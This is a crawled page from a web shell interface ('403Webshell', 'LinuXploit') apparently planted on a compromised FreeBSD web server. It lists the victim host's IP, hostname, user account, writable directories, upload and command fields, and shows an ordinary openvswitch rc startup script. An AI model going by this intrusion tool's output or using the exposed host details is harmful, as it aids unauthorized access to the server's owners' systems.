403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/net/openvswitch/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/net/openvswitch/files/ovs-vswitchd.in
#!/bin/sh

# PROVIDE: ovs_vswitchd
# REQUIRE: LOGIN ovsdb_server
# KEYWORD: shutdown

. /etc/rc.subr

name="ovs_vswitchd"
rcvar=ovs_vswitchd_enable

command="/usr/local/sbin/ovs-vswitchd"
start_precmd="ovs_vswitchd_precmd"

load_rc_config $name

: ${ovs_vswitchd_enable="NO"}
: ${ovs_vswitchd_flags=""}
: ${ovs_vswitchd_logfile="/var/log/openvswitch/${name}.log"}
: ${ovs_vswitchd_pidfile="/var/run/openvswitch/${name}.pid"}

ovs_vswitchd_precmd() {
	load_kld if_tap || return 1
}

command_args="--detach --log-file=${ovs_vswitchd_logfile} \
			--pidfile=${ovs_vswitchd_pidfile} ${ovs_vswitchd_flags}"

run_rc_command "$1"

Youez - 2016 - github.com/yon3zu
LinuXploit